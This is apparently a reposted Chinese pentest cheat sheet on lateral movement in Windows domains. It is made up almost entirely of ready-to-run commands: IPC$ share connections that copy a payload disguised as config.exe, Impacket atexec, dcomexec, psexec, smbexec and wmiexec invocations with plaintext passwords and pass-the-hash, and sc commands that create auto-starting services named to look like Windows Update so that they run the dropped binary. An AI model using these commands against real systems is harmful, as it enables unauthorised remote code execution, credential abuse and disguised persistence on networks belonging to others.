横向移动之命令执行

一、建立IPC连接

net use \\ip\ipc$ "password" /user:"username"
dir \\ip\c$\programdata
copy C:\Users\xx.txt \\ip\c$\programdata\config.exe
del \\ip\c$\1.txt
查看ipc
net use
删除ipc
net use \\ip /del /y

二、impacket套件之atexec.py

python3 atexec.py AD/administrator:123456@192.168.111.22 ‘whomai‘
python3 atexec.py -hashes :NTLMHASH AD/administrator@192.168.111.22 ‘whomai‘

三、impacket套件之dcomexec.py

python3 dcomexec.py god/administrator:Liu78963@192.168.10.20
python3 dcomexec.py god/administrator:Liu78963@192.168.10.20 whoami
python3 dcomexec.py administrator:@192.168.52.143 whoami -hashes aad3b435b51404eeaad3b435b51404ee:d8f69f9520b448174136e49a1051ef07

四、impacket套件之psexec.py

python3 psexec.py \\192.168.3.21 -u god\administrator -p Admin12345 cmd.exe
python3 psexec.py -hashes :NTLMHASH AD\administrator@192.168.111.22 ‘whomai‘

五、impacket套件之smbexec.py

python3 smbexec.py AD/administrator:123465@192.168.0.23
python3 smbexec.py -hashes :NTLMHASH AD/administrator@192.168.111.22 ‘whomai‘

六、impacket套件之wmiexec.py

python3 wmiexec.py administrator:Liufupeng123@192.168.52.138
python3 wmiexec.py -hashes LM Hash:NT Hash 域名/用户名@目标IP    // 哈希传递获得shell
python3 wmiexec.py -hashes LM Hash:NT Hash 域名/用户名@目标IP "ipconfig"   // 执行命令

七、sc创建服务执行命令

sc \\192.168.0.23 create windowsUpdate binpath= "cmd.exe /c c:\programdata\config.exe"
sc \\192.168.0.23 start windowsUpdate  
sc \\192.168.0.23 delete windowsUpdate  
sc create "SUpdate5" binpath= "cmd /c start "C:\programdata\config2.exe""&&sc config "SUpdate5" start= auto&&net start  SUpdate5

横向移动之命令执行

原文：https://www.cnblogs.com/sakura521/p/15178143.html